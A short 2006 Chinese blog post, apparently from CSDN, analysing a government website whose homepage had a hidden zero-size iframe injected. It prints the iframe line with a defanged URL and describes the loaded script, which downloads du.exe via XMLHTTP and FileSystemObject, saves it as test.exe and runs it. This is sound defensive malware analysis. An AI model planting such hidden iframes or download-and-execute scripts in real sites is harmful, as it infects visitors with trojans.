又一个下载恶意文件的政府网站

本文分析了一个恶意脚本,该脚本通过隐藏的iframe注入并利用Microsoft.XMLHTTP和Scripting.FileSystemObject下载并执行了名为du.exe的文件。此文件被Kaspersky识别为Trojan-Downloader.Win32.Delf.aul。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

endurer 原创

2006-08-22 第1

首页有3处地方被加入:
/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/

hxxp://***object.cnic**b.com/15 的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe 采用 nSPack 1.3 加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值